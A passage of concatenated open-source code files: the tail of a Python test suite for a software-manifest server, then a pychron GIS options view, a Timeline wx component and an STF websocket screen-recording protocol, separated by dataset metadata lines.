uuid_override = 'foouuidbar'
uuid_override_full = 'CN=%s' % uuid_override
client_id_str, client_id_dict = self._GetClientIdTestData()
client_id_dict['uuid'] = uuid_override
for track in common.common.TRACKS:
cid = client_id_str % track
client_id_dict['track'] = track
self.assertEqual(
client_id_dict, common.ParseClientId(cid, uuid=uuid_override_full))
def testParseClientIdWithInvalidType(self):
"""Tests ParseClientId() with an invalid type; checks for None."""
client_id_str, client_id_dict = self._GetClientIdTestData()
client_id_str = client_id_str.replace('uptime=123.0', 'uptime=hello')
client_id_dict['uptime'] = None
for track in common.common.TRACKS:
cid = client_id_str % track
client_id_dict['track'] = track
self.assertEqual(client_id_dict, common.ParseClientId(cid))
def testParseClientIdWithoutRequiredFields(self):
"""Tests ParseClientId() without required fields."""
client_id_dict = {}
for key in common.CLIENT_ID_FIELDS.keys():
client_id_dict[key] = None
client_id_dict['track'] = common.common.DEFAULT_TRACK
# empty cid
self.assertEqual(client_id_dict, common.ParseClientId(''))
# empty cid with delimiters
self.assertEqual(client_id_dict, common.ParseClientId('|||'))
# cid with unknown key name
client_id_dict['ASDFMOOCOW'] = '1'
self.assertEqual(client_id_dict, common.ParseClientId('ASDFMOOCOW=1'))
del client_id_dict['ASDFMOOCOW']
def testParseClientIdWithVeryLongStrValues(self):
"""Tests ParseClientId() with str values that are over 500 characters."""
long_owner = ''.join(str(i) for i in range(999))
client_id_str, client_id_dict = self._GetClientIdTestData()
client_id_str = client_id_str.replace(
'owner=foouser', 'owner=%s' % long_owner)
client_id_dict['owner'] = long_owner[:500]
client_id_dict['track'] = common.common.DEFAULT_TRACK
output = common.ParseClientId(client_id_str)
for k in client_id_dict:
self.assertEqual(client_id_dict[k], output.get(k))
def testIsPanicMode(self):
"""Tests IsPanicMode()."""
mode = common.PANIC_MODES[0]
k = '%s%s' % (common.PANIC_MODE_PREFIX, mode)
self.mox.StubOutWithMock(
common.models.KeyValueCache, 'MemcacheWrappedGet')
common.models.KeyValueCache.MemcacheWrappedGet(k).AndReturn(1)
common.models.KeyValueCache.MemcacheWrappedGet(k).AndReturn(None)
self.mox.ReplayAll()
self.assertTrue(common.IsPanicMode(mode))
self.assertFalse(common.IsPanicMode(mode))
self.assertRaises(ValueError, common.IsPanicMode, 'never a mode')
self.mox.VerifyAll()
def testSetPanicModeWhenValueError(self):
self.mox.ReplayAll()
self.assertRaises(ValueError, common.SetPanicMode, 'never a mode', True)
self.mox.VerifyAll()
def testSetPanicModeWhenEnable(self):
"""Tests SetPanicMode()."""
mode = common.PANIC_MODES[0]
k = '%s%s' % (common.PANIC_MODE_PREFIX, mode)
self.mox.StubOutWithMock(
common.models.KeyValueCache, 'get_by_key_name')
self.mox.StubOutWithMock(
common.models.KeyValueCache, 'ResetMemcacheWrap')
self.mox.StubOutWithMock(
common.models, 'KeyValueCache')
mock_entity = self.mox.CreateMockAnything()
common.models.KeyValueCache.get_by_key_name(k).AndReturn('existing')
common.models.KeyValueCache.ResetMemcacheWrap(k).AndReturn(None)
common.models.KeyValueCache.get_by_key_name(k).AndReturn(None)
common.models.KeyValueCache(key_name=k).AndReturn(mock_entity)
mock_entity.put().AndReturn(None)
common.models.KeyValueCache.ResetMemcacheWrap(k).AndReturn(None)
self.mox.ReplayAll()
common.SetPanicMode(mode, True)
common.SetPanicMode(mode, True)
self.assertEqual(mock_entity.text_value, '1')
self.mox.VerifyAll()
def testSetPanicModeWhenDisable(self):
"""Tests SetPanicMode()."""
mode = common.PANIC_MODES[0]
k = '%s%s' % (common.PANIC_MODE_PREFIX, mode)
self.mox.StubOutWithMock(
common.models.KeyValueCache, 'get_by_key_name')
self.mox.StubOutWithMock(
common.models.KeyValueCache, 'ResetMemcacheWrap')
self.mox.StubOutWithMock(
common.models, 'KeyValueCache')
mock_entity = self.mox.CreateMockAnything()
common.models.KeyValueCache.get_by_key_name(k).AndReturn(mock_entity)
mock_entity.delete()
common.models.KeyValueCache.ResetMemcacheWrap(k).AndReturn(None)
common.models.KeyValueCache.get_by_key_name(k).AndReturn(None)
common.models.KeyValueCache.ResetMemcacheWrap(k).AndReturn(None)
self.mox.ReplayAll()
common.SetPanicMode(mode, False)
common.SetPanicMode(mode, False)
self.mox.VerifyAll()
def testIsPanicModeNoPackages(self):
"""Test IsPanicModeNoPackages()."""
self.mox.StubOutWithMock(common, 'IsPanicMode')
common.IsPanicMode(common.PANIC_MODE_NO_PACKAGES).AndReturn(123)
self.mox.ReplayAll()
self.assertEqual(123, common.IsPanicModeNoPackages())
self.mox.VerifyAll()
def testSetPanicModeNoPackages(self):
"""Test SetPanicModeNoPackages()."""
enabled = 12345
self.mox.StubOutWithMock(common, 'SetPanicMode')
common.SetPanicMode(common.PANIC_MODE_NO_PACKAGES, enabled).AndReturn(0)
self.mox.ReplayAll()
common.SetPanicModeNoPackages(enabled)
self.mox.VerifyAll()
def testWriteMSULog(self):
"""Test WriteComputerMSULog()."""
self.mox.StubOutWithMock(common.util.Datetime, 'utcfromtimestamp')
uuid = 'uuid'
details = {
'event': 'event',
'source': 'source',
'user': 'user',
'time': '1292013344.12',
'desc': 'desc',
}
dt = common.datetime.datetime.utcnow()
key = '%s_%s_%s' % (uuid, details['source'], details['event'])
mock_model = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(common.models, 'ComputerMSULog')
common.models.ComputerMSULog(key_name=key).AndReturn(mock_model)
common.util.Datetime.utcfromtimestamp('1292013344.12').AndReturn(dt)
mock_model.mtime = None
mock_model.put().AndReturn(None)
self.mox.ReplayAll()
common.WriteComputerMSULog(uuid, details)
self.assertEqual(mock_model.uuid, uuid)
self.assertEqual(mock_model.event, details['event'])
self.assertEqual(mock_model.source, details['source'])
self.assertEqual(mock_model.user, details['user'])
self.assertEqual(mock_model.desc, details['desc'])
self.assertEqual(mock_model.mtime, dt)
self.mox.VerifyAll()
def testWriteMSULogWhenOlder(self):
"""Test WriteComputerMSULog()."""
uuid = 'uuid'
details = {
'event': 'event',
'source': 'source',
'user': 'user',
'time': 1292013344.12,
'desc': 'desc',
}
key = '%s_%s_%s' % (uuid, details['source'], details['event'])
mock_model = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(common.models, 'ComputerMSULog')
common.models.ComputerMSULog(key_name=key).AndReturn(mock_model)
mock_model.mtime = common.datetime.datetime(2011, 1, 1, 0, 0, 0)
self.mox.ReplayAll()
common.WriteComputerMSULog(uuid, details)
self.mox.VerifyAll()
def testModifyList(self):
"""Tests _ModifyList()."""
l = []
common._ModifyList(l, 'yes')
common._ModifyList(l, 'no')
self.assertEqual(l, ['yes', 'no']) # test modify add.
common._ModifyList(l, '-no')
self.assertEqual(l, ['yes']) # test modify remove.
common._ModifyList(l, '-This value does not exist')
self.assertEqual(l, ['yes']) # test modify remove of non-existent value.
def testGenerateDynamicManifest(self):
"""Tests GenerateDynamicManifest()."""
plist_xml = 'fooxml'
manifest = 'stable'
site = 'foosite'
os_version = '10.6.5'
owner = 'foouser'
uuid = '12345'
client_id = {
'track': manifest, 'site': site, 'os_version': os_version,
'owner': owner, 'uuid': uuid,
}
blocked_package_name = 'FooBlockedPkg'
user_settings = {
'BlockPackages': [blocked_package_name]
}
install_type_optional_installs = 'optional_installs'
install_type_managed_updates = 'managed_updates'
value_one = 'foopkg'
site_mod_one = self.mox.CreateMockAnything()
site_mod_one.manifests = [manifest]
site_mod_one.enabled = True
site_mod_one.install_types = [install_type_optional_installs]
site_mod_one.value = value_one
site_mod_disabled = self.mox.CreateMockAnything()
site_mod_disabled.enabled = False
site_mods = [site_mod_one, site_mod_disabled]
self.mox.StubOutWithMock(
common.models.SiteManifestModification, 'MemcacheWrappedGetAllFilter')
common.models.SiteManifestModification.MemcacheWrappedGetAllFilter(
(('site =', site),)).AndReturn(site_mods)
os_version_mod_one = self.mox.CreateMockAnything()
os_version_mod_one.manifests = [manifest]
os_version_mod_one.enabled = True
os_version_mod_one.install_types = [install_type_managed_updates]
os_version_mod_one.value = 'foo os version pkg'
os_version_mods = [os_version_mod_one]
self.mox.StubOutWithMock(
common.models.OSVersionManifestModification,
'MemcacheWrappedGetAllFilter')
common.models.OSVersionManifestModification.MemcacheWrappedGetAllFilter(
(('os_version =', os_version),)).AndReturn(os_version_mods)
owner_mod_one = self.mox.CreateMockAnything()
owner_mod_one.manifests = [manifest]
owner_mod_one.enabled = True
owner_mod_one.install_types = [
install_type_optional_installs, install_type_managed_updates]
owner_mod_one.value = 'foo owner pkg'
owner_mods = [owner_mod_one]
self.mox.StubOutWithMock(
common.models.OwnerManifestModification,
'MemcacheWrappedGetAllFilter')
common.models.OwnerManifestModification.MemcacheWrappedGetAllFilter(
(('owner =', client_id['owner']),)).AndReturn(owner_mods)
uuid_mod_one = self.mox.CreateMockAnything()
uuid_mod_one.enabled = False
uuid_mods = [uuid_mod_one]
self.mox.StubOutWithMock(
common.models.UuidManifestModification,
'MemcacheWrappedGetAllFilter')
common.models.UuidManifestModification.MemcacheWrappedGetAllFilter(
(('uuid =', client_id['uuid']),)).AndReturn(uuid_mods)
computer_tags = ['footag1', 'footag2']
self.mox.StubOutWithMock(common.models.Tag, 'GetAllTagNamesForKey')
self.mox.StubOutWithMock(common.models.db.Key, 'from_path')
common.models.db.Key.from_path('Computer', client_id['uuid']).AndReturn('k')
common.models.Tag.GetAllTagNamesForKey('k').AndReturn(computer_tags)
tag_mod_one = self.mox.CreateMockAnything()
tag_mod_one.enabled = False
tag_mods = [tag_mod_one]
self.mox.StubOutWithMock(
common.models.TagManifestModification,
'MemcacheWrappedGetAllFilter')
common.models.TagManifestModification.MemcacheWrappedGetAllFilter(
(('tag_key_name =', 'footag1'),)).AndReturn([])
common.models.TagManifestModification.MemcacheWrappedGetAllFilter(
(('tag_key_name =', 'footag2'),)).AndReturn(tag_mods)
mock_plist = self.mox.CreateMockAnything()
managed_installs = ['FooPkg', blocked_package_name]
self.mox.StubOutWithMock(common.plist_module, 'UpdateIterable')
self.mox.StubOutWithMock(common.plist_module, 'MunkiManifestPlist')
common.plist_module.MunkiManifestPlist(plist_xml).AndReturn(mock_plist)
mock_plist.Parse().AndReturn(None)
common.plist_module.UpdateIterable(
mock_plist, site_mod_one.install_types[0], site_mod_one.value,
default=[], op=common._ModifyList)
common.plist_module.UpdateIterable(
mock_plist, os_version_mod_one.install_types[0],
os_version_mod_one.value, default=[], op=common._ModifyList)
common.plist_module.UpdateIterable(
mock_plist, owner_mod_one.install_types[0],
owner_mod_one.value, default=[], op=common._ModifyList)
common.plist_module.UpdateIterable(
mock_plist, owner_mod_one.install_types[1],
owner_mod_one.value, default=[], op=common._ModifyList)
for install_type in common.common.INSTALL_TYPES:
if install_type == 'managed_installs':
mock_plist.get(install_type, []).AndReturn(managed_installs)
mock_plist.__getitem__(install_type).AndReturn(managed_installs)
else:
mock_plist.get(install_type, []).AndReturn([])
mock_plist.GetXml().AndReturn(plist_xml)
self.mox.ReplayAll()
xml_out = common.GenerateDynamicManifest(
plist_xml, client_id, user_settings=user_settings)
self.assertEqual(plist_xml, xml_out)
self.assertTrue(blocked_package_name not in managed_installs)
self.mox.VerifyAll()
def testGenerateDynamicManifestWhenOnlyUserSettingsMods(self):
"""Test GenerateDynamicManifest() when only user_settings mods exist."""
self.mox.StubOutWithMock(common.models, 'SiteManifestModification')
self.mox.StubOutWithMock(common.models, 'OSVersionManifestModification')
self.mox.StubOutWithMock(common.models, 'OwnerManifestModification')
self.mox.StubOutWithMock(common.models, 'UuidManifestModification')
self.mox.StubOutWithMock(common.models, 'TagManifestModification')
self.mox.StubOutWithMock(common.models.db.Key, 'from_path')
self.mox.StubOutWithMock(common.models.Tag, 'GetAllTagNamesForKey')
client_id = {
'site': 'sitex',
'os_version': 'os_versionx',
'owner': 'ownerx',
'uuid': 'uuidx',
'track': 'trackx',
}
blocked_package_name = 'FooPackage'
user_settings = {
'BlockPackages': [blocked_package_name],
'FlashDeveloper': True,
}
plist_xml = '<plist xml>'
common.models.SiteManifestModification.MemcacheWrappedGetAllFilter(
(('site =', client_id['site']),)).AndReturn([])
common.models.OSVersionManifestModification.MemcacheWrappedGetAllFilter(
(('os_version =', client_id['os_version']),)).AndReturn([])
common.models.OwnerManifestModification.MemcacheWrappedGetAllFilter(
(('owner =', client_id['owner']),)).AndReturn([])
common.models.UuidManifestModification.MemcacheWrappedGetAllFilter(
(('uuid =', client_id['uuid']),)).AndReturn([])
common.models.db.Key.from_path('Computer', client_id['uuid']).AndReturn('k')
common.models.Tag.GetAllTagNamesForKey('k').AndReturn(['tag'])
common.models.TagManifestModification.MemcacheWrappedGetAllFilter(
(('tag_key_name =', 'tag'),)).AndReturn([])
managed_installs = [
'FooPkg', blocked_package_name, common.FLASH_PLUGIN_NAME]
managed_updates = []
mock_plist = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(common.plist_module, 'MunkiManifestPlist')
common.plist_module.MunkiManifestPlist(plist_xml).AndReturn(mock_plist)
mock_plist.Parse().AndReturn(None)
# FlashDeveloper is True, so managed_updates and managed_installs are read.
mock_plist.__getitem__(common.common.MANAGED_UPDATES).AndReturn(
managed_updates)
mock_plist.__getitem__(common.common.MANAGED_UPDATES).AndReturn(
managed_installs)
for blocked_pkg in user_settings['BlockPackages']:
for install_type in common.common.INSTALL_TYPES:
if install_type == 'managed_installs':
mock_plist.get(install_type, []).AndReturn(managed_installs)
if blocked_pkg == blocked_package_name:
mock_plist.__getitem__(install_type).AndReturn(managed_installs)
else:
mock_plist.get(install_type, []).AndReturn([])
mock_plist.GetXml().AndReturn(plist_xml)
self.mox.ReplayAll()
xml_out = common.GenerateDynamicManifest(
plist_xml, client_id, user_settings=user_settings)
self.assertEqual(plist_xml, xml_out)
self.assertTrue(blocked_package_name not in managed_installs)
# non-debug flashplugin should be removed from managed_updates
self.assertTrue(common.FLASH_PLUGIN_NAME not in managed_installs)
self.assertTrue(common.FLASH_PLUGIN_DEBUG_NAME in managed_updates)
self.mox.VerifyAll()
def testGenerateDynamicManifestWhenNoMods(self):
"""Test GenerateDynamicManifest() when no manifest mods are available."""
self.mox.StubOutWithMock(common.models, 'SiteManifestModification')
self.mox.StubOutWithMock(common.models, 'OSVersionManifestModification')
self.mox.StubOutWithMock(common.models, 'OwnerManifestModification')
self.mox.StubOutWithMock(common.models, 'UuidManifestModification')
self.mox.StubOutWithMock(common.models.db.Key, 'from_path')
self.mox.StubOutWithMock(common.models.Tag, 'GetAllTagNamesForKey')
client_id = {
'site': 'sitex',
'os_version': 'os_versionx',
'owner': 'ownerx',
'uuid': 'uuidx',
'track': 'trackx',
}
user_settings = None
plist_xml = '<plist xml>'
common.models.SiteManifestModification.MemcacheWrappedGetAllFilter(
(('site =', client_id['site']),)).AndReturn([])
common.models.OSVersionManifestModification.MemcacheWrappedGetAllFilter(
(('os_version =', client_id['os_version']),)).AndReturn([])
common.models.OwnerManifestModification.MemcacheWrappedGetAllFilter(
        (('owner =', client_id['owner']),)).AndReturn([])
common.models.UuidManifestModification.MemcacheWrappedGetAllFilter(
        (('uuid =', client_id['uuid']),)).AndReturn([])
common.models.db.Key.from_path('Computer', client_id['uuid']).AndReturn('k')
common.models.Tag.GetAllTagNamesForKey('k').AndReturn([])
self.mox.ReplayAll()
self.assertTrue(
common.GenerateDynamicManifest(
plist_xml, client_id, user_settings) is plist_xml)
self.mox.VerifyAll()
def testGetComputerManifest(self):
"""Test ComputerInstallsPending()."""
uuid = 'uuid'
last_notified_datetime = self.mox.CreateMockAnything()
client_id = {
'uuid': 'uuid',
'owner': 'owner',
'hostname': 'hostname',
'serial': 'serial',
'config_track': 'config_track',
'track': 'track',
'site': 'site',
'os_version': 'os_version',
'client_version': 'client_version',
'on_corp': True,
'last_notified_datetime': last_notified_datetime,
'uptime': None,
'root_disk_free': None,
'user_disk_free': None,
}
computer = test.GenericContainer(**client_id)
computer.connections_on_corp = 2
computer.connections_off_corp = 1
computer.user_settings = None
# PackageInfo entities
mock_pl1 = self.mox.CreateMockAnything()
mock_pl2 = self.mox.CreateMockAnything()
mock_pl3 = self.mox.CreateMockAnything()
mock_pl4 = self.mox.CreateMockAnything()
package_infos = [
test.GenericContainer(plist=mock_pl1, version='1.0', name='fooname1'),
test.GenericContainer(plist=mock_pl2, version='1.0', name='fooname2'),
test.GenericContainer(plist=mock_pl3, version='1.0', name='fooname3'),
test.GenericContainer(plist=mock_pl4, version='1.0', name='fooname4'),
]
packagemap = {}
self.mox.StubOutWithMock(common.models, 'Computer')
self.mox.StubOutWithMock(common, 'IsPanicModeNoPackages')
self.mox.StubOutWithMock(common.models, 'Manifest')
self.mox.StubOutWithMock(common, 'GenerateDynamicManifest')
self.mox.StubOutWithMock(common.plist_module, 'MunkiManifestPlist')
self.mox.StubOutWithMock(common.models, 'PackageInfo')
self.mox.StubOutWithMock(common.plist_module, 'MunkiPackageInfoPlist')
# mock manifest creation
common.models.Computer.get_by_key_name(uuid).AndReturn(computer)
common.IsPanicModeNoPackages().AndReturn(False)
mock_plist = self.mox.CreateMockAnything()
common.models.Manifest.MemcacheWrappedGet('track').AndReturn(
test.GenericContainer(enabled=True, plist=mock_plist))
common.GenerateDynamicManifest(
mock_plist, client_id, user_settings=None).AndReturn(
'manifest_plist')
# mock manifest parsing
mock_manifest_plist = self.mox.CreateMockAnything()
common.plist_module.MunkiManifestPlist('manifest_plist').AndReturn(
mock_manifest_plist)
mock_manifest_plist.Parse().AndReturn(None)
# mock manifest reading and package map creation
mock_package_info = self.mox.CreateMockAnything()
common.models.PackageInfo.all().AndReturn(mock_package_info)
iter_return = []
for package_info in package_infos:
iter_return.append(test.GenericContainer(
plist=package_info.plist,
name=package_info.name))
package_info.plist.get('display_name', None).AndReturn(None)
package_info.plist.get('name').AndReturn(package_info.name)
package_info.plist.get('version', '').AndReturn(package_info.version)
packagemap[package_info.name] = '%s-%s' % (
package_info.name, package_info.version)
def __iter_func():
for i in iter_return:
yield i
mock_package_info.__iter__().AndReturn(__iter_func())
manifest_expected = {
'plist': mock_manifest_plist,
'packagemap': packagemap,
}
self.mox.ReplayAll()
manifest = common.GetComputerManifest(uuid=uuid, packagemap=True)
self.assertEqual(manifest, manifest_expected)
self.mox.VerifyAll()
def testGetComputerManifestWhenEmptyDynamic(self):
"""Test ComputerInstallsPending()."""
uuid = 'uuid'
last_notified_datetime = self.mox.CreateMockAnything()
client_id = {
'uuid': 'uuid',
'owner': 'owner',
'hostname': 'hostname',
'serial': 'serial',
'config_track': 'config_track',
'track': 'track',
'site': 'site',
'os_version': 'os_version',
'client_version': 'client_version',
'on_corp': True,
'last_notified_datetime': last_notified_datetime,
'uptime': None,
'root_disk_free': None,
'user_disk_free': None,
}
computer = test.GenericContainer(**client_id)
computer.connections_on_corp = 2
computer.connections_off_corp = 1
computer.user_settings = None
packagemap = {}
self.mox.StubOutWithMock(common.models, 'Computer')
self.mox.StubOutWithMock(common, 'IsPanicModeNoPackages')
self.mox.StubOutWithMock(common.models, 'Manifest')
self.mox.StubOutWithMock(common, 'GenerateDynamicManifest')
self.mox.StubOutWithMock(common.plist_module, 'MunkiManifestPlist')
self.mox.StubOutWithMock(common.models, 'PackageInfo')
self.mox.StubOutWithMock(common.plist_module, 'MunkiPackageInfoPlist')
# mock manifest creation
common.models.Computer.get_by_key_name(uuid).AndReturn(computer)
common.IsPanicModeNoPackages().AndReturn(False)
mock_plist = self.mox.CreateMockAnything()
common.models.Manifest.MemcacheWrappedGet('track').AndReturn(
test.GenericContainer(enabled=True, plist=mock_plist))
common.GenerateDynamicManifest(
mock_plist, client_id, user_settings=None).AndReturn(None)
self.mox.ReplayAll()
self.assertRaises(
common.ManifestNotFoundError,
common.GetComputerManifest, uuid=uuid)
self.mox.VerifyAll()
def testGetComputerManifestWhenManifestNotFound(self):
"""Test ComputerInstallsPending()."""
uuid = 'uuid'
last_notified_datetime = self.mox.CreateMockAnything()
client_id = {
'uuid': 'uuid',
'owner': 'owner',
'hostname': 'hostname',
'serial': 'serial',
'config_track': 'config_track',
'track': 'track',
'site': 'site',
'os_version': 'os_version',
'client_version': 'client_version',
'on_corp': True,
'last_notified_datetime': last_notified_datetime,
'uptime': None,
'root_disk_free': None,
'user_disk_free': None,
}
computer = test.GenericContainer(**client_id)
computer.connections_on_corp = 2
computer.connections_off_corp = 1
computer.user_settings = None
packagemap = {}
self.mox.StubOutWithMock(common.models, 'Computer')
self.mox.StubOutWithMock(common, 'IsPanicModeNoPackages')
self.mox.StubOutWithMock(common.models, 'Manifest')
# mock manifest creation
common.models.Computer.get_by_key_name(uuid).AndReturn(computer)
common.IsPanicModeNoPackages().AndReturn(False)
common.models.Manifest.MemcacheWrappedGet('track').AndReturn(None)
self.mox.ReplayAll()
self.assertRaises(
common.ManifestNotFoundError,
common.GetComputerManifest, uuid=uuid)
self.mox.VerifyAll()
def testGetComputerManifestWhenManifestNotEnabled(self):
"""Test ComputerInstallsPending()."""
uuid = 'uuid'
last_notified_datetime = self.mox.CreateMockAnything()
client_id = {
'uuid': 'uuid',
'owner': 'owner',
'hostname': 'hostname',
'serial': 'serial',
'config_track': 'config_track',
'track': 'track',
'site': 'site',
'os_version': 'os_version',
'client_version': 'client_version',
'on_corp': True,
'last_notified_datetime': last_notified_datetime,
'uptime': None,
'root_disk_free': None,
'user_disk_free': None,
}
computer = test.GenericContainer(**client_id)
computer.connections_on_corp = 2
computer.connections_off_corp = 1
computer.user_settings = None
self.mox.StubOutWithMock(common.models, 'Computer')
self.mox.StubOutWithMock(common, 'IsPanicModeNoPackages')
self.mox.StubOutWithMock(common.models, 'Manifest')
# mock manifest creation
common.models.Computer.get_by_key_name(uuid).AndReturn(computer)
common.IsPanicModeNoPackages().AndReturn(False)
common.models.Manifest.MemcacheWrappedGet('track').AndReturn(
test.GenericContainer(enabled=False, plist='manifest_plist'))
self.mox.ReplayAll()
self.assertRaises(
common.ManifestDisabledError,
common.GetComputerManifest, uuid=uuid)
self.mox.VerifyAll()
def testGetComputerManifestIsPanicMode(self):
"""Test ComputerInstallsPending()."""
uuid = 'uuid'
last_notified_datetime = self.mox.CreateMockAnything()
client_id = {
'uuid': 'uuid',
'owner': 'owner',
'hostname': 'hostname',
'serial': 'serial',
'config_track': 'config_track',
'track': 'track',
'site': 'site',
'os_version': 'os_version',
'client_version': 'client_version',
'on_corp': True,
'last_notified_datetime': last_notified_datetime,
'uptime': None,
'root_disk_free': None,
'user_disk_free': None,
}
computer = test.GenericContainer(**client_id)
computer.connections_on_corp = 2
computer.connections_off_corp = 1
computer.user_settings = None
self.mox.StubOutWithMock(common.models, 'Computer')
self.mox.StubOutWithMock(common, 'IsPanicModeNoPackages')
common.models.Computer.get_by_key_name(uuid).AndReturn(computer)
common.IsPanicModeNoPackages().AndReturn(True)
manifest_expected = '%s%s' % (
common.plist_module.PLIST_HEAD,
common.plist_module.PLIST_FOOT)
self.mox.ReplayAll()
manifest = common.GetComputerManifest(uuid=uuid)
self.assertEqual(manifest, manifest_expected)
self.mox.VerifyAll()
def testGetComputerManifestWhenNoBadArgs(self):
"""Test GetComputerManifest()."""
self.mox.ReplayAll()
# missing args
self.assertRaises(ValueError, common.GetComputerManifest)
# missing args
self.assertRaises(ValueError, common.GetComputerManifest, packagemap=True)
# client_id should be a dict
self.assertRaises(ValueError, common.GetComputerManifest, client_id=1)
self.mox.VerifyAll()
def testGetComputerManifestWhenNoComputer(self):
"""Test GetComputerManifest()."""
uuid = 'uuid'
self.mox.StubOutWithMock(common.models, 'Computer')
# mock manifest creation
common.models.Computer.get_by_key_name(uuid).AndReturn(None)
self.mox.ReplayAll()
self.assertRaises(
common.ComputerNotFoundError,
common.GetComputerManifest,
uuid=uuid)
self.mox.VerifyAll()
logging.basicConfig(filename='/dev/null')
def main(unused_argv):
test.main(unused_argv)
if __name__ == '__main__':
app.run()
| apache-2.0 | 4,636,566,650,788,164,000 | 37.957895 | 80 | 0.683641 | false |
NMGRL/pychron | pychron/gis/views.py | 1 | 2459 | # ===============================================================================
# Copyright 2020 ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from traitsui.api import View, Item, UItem, HGroup, Heading, spring, FileEditor
from traitsui.editors import InstanceEditor, ListEditor
from traitsui.group import VGroup
from pychron.core.pychron_traits import BorderVGroup
from pychron.options.options import SubOptions, GroupSubOptions as _GroupSubOptions
from pychron.paths import paths
from pychron.pychron_constants import MAIN
class MainView(SubOptions):
def traits_view(self):
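        # The basemap can come from a web map service URI template or from a
        # local raster file; the resulting basemap_uri is shown at the bottom.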
v = View(BorderVGroup(Item('basemap_uri_template', label='Base Map URI'),
label='Web Map Services'),
HGroup(spring, Heading('or'), spring),
BorderVGroup(Item('basemap_path', editor=FileEditor(root_path=paths.data_dir)),
label='Local Raster'),
UItem('basemap_uri', style='custom'))
return v
# class AppearanceView(SubOptions):
# def traits_view(self):
# v = View(BorderVGroup(Item('symbol_size'),
# Item('symbol_kind'),
# Item('symbol_color')))
# return v
class GroupSubOptions(_GroupSubOptions):
def traits_view(self):
g = self._make_group()
return self._make_view(g)
class LayersSubOptions(SubOptions):
def traits_view(self):
v = View(VGroup(HGroup(UItem('add_layer_button')),
UItem('layers', editor=ListEditor(mutable=True, style='custom',
editor=InstanceEditor()))))
return v
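# Maps sub-option tab names to their view classes (presumably consumed by the
# surrounding options framework when building the editor).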
VIEWS = {MAIN.lower(): MainView,
'groups': GroupSubOptions,
'layers': LayersSubOptions}
# ============= EOF =============================================
| apache-2.0 | -7,972,781,191,736,847,000 | 36.830769 | 96 | 0.583571 | false |
linostar/timeline-clone | source/timelinelib/wxgui/component.py | 1 | 2662 | # Copyright (C) 2009, 2010, 2011 Rickard Lindberg, Roger Lindberg
#
# This file is part of Timeline.
#
# Timeline is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Timeline is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Timeline. If not, see <http://www.gnu.org/licenses/>.
import wx
from timelinelib.db import db_open
from timelinelib.wxgui.components.timeline import TimelinePanel
class DummyConfig(object):
def __init__(self):
self.window_size = (100, 100)
self.window_pos = (100, 100)
self.window_maximized = False
self.show_sidebar = True
self.show_legend = True
self.sidebar_width = 200
self.recently_opened = []
self.open_recent_at_startup = False
self.balloon_on_hover = True
self.week_start = "monday"
self.use_inertial_scrolling = False
def get_sidebar_width(self):
return self.sidebar_width
def get_show_sidebar(self):
return self.show_sidebar
def get_show_legend(self):
return self.show_legend
def get_balloon_on_hover(self):
return self.balloon_on_hover
class DummyStatusBarAdapter(object):
def set_text(self, text):
pass
def set_hidden_event_count_text(self, text):
pass
def set_read_only_text(self, text):
pass
class DummyMainFrame(object):
def enable_disable_menus(self):
pass
def edit_ends(self):
pass
def ok_to_edit(self):
return False
class TimelineComponent(TimelinePanel):
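    # Wires a TimelinePanel to dummy config/status-bar/main-frame collaborators
    # so the timeline canvas can be used as a standalone wx component.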
def __init__(self, parent):
TimelinePanel.__init__(
self, parent, DummyConfig(), self.handle_db_error,
DummyStatusBarAdapter(), DummyMainFrame())
self.activated()
def handle_db_error(self, e):
pass
def open_timeline(self, path):
timeline = db_open(path)
self.timeline_canvas.set_timeline(timeline)
self.sidebar.category_tree.set_timeline_view(
self.timeline_canvas.get_timeline(),
self.timeline_canvas.get_view_properties()
)
def clear_timeline(self):
self.timeline_canvas.set_timeline(None)
self.sidebar.category_tree.set_no_timeline_view()
| gpl-3.0 | 7,427,410,965,997,319,000 | 26.163265 | 70 | 0.661533 | false |
2gis/stf-utils | stf_utils/stf_record/protocol.py | 1 | 2324 | import time
import logging
from autobahn.asyncio.websocket import WebSocketClientProtocol
log = logging.getLogger(__name__)
class STFRecordProtocol(WebSocketClientProtocol):
img_directory = None
address = None
resolution = None
def __init__(self):
super().__init__()
self.first_msg_timestamp = None
self.previous_msg_timestamp = None
self.current_msg_timestamp = None
def _construct_img_filename(self):
img_filename = "{0}.jpg".format(
self.current_msg_timestamp - self.first_msg_timestamp
)
return img_filename
@staticmethod
def _write_image_file(img_filename, binary_data):
with open(img_filename, 'bw+') as file:
log.debug('Writing image data to file {0}'.format(file.name))
file.write(binary_data)
def _write_metadata(self, img_filename):
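        # Each frame gets a "duration"/"file" entry pair; this looks like the
        # ffmpeg concat demuxer list format (an assumption, not stated here).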
metadata_filename = "{0}/input.txt".format(self.img_directory)
m_file = open(metadata_filename, 'a')
log.debug('Appending image metadata to file {0}'.format(m_file.name))
if self.previous_msg_timestamp is not None:
duration = self.current_msg_timestamp - self.previous_msg_timestamp
m_file.write("duration {0}\n".format(duration))
m_file.write("file '{0}'\n".format(img_filename))
m_file.close()
def save_data_and_metadata(self, binary_data):
img_filename = self._construct_img_filename()
self._write_image_file("{0}/{1}".format(self.img_directory, img_filename), binary_data)
self._write_metadata(img_filename)
def onOpen(self):
log.debug('Starting receive binary data')
if self.resolution:
self.sendMessage(self.resolution.encode('ascii'))
self.sendMessage('on'.encode('ascii'))
def onMessage(self, payload, isBinary):
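        # Every binary websocket frame is saved as one image; the timestamps
        # recorded here become the per-frame durations written to input.txt.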
if isBinary:
self.current_msg_timestamp = time.time()
if self.previous_msg_timestamp is None:
self.first_msg_timestamp = self.current_msg_timestamp
self.save_data_and_metadata(payload)
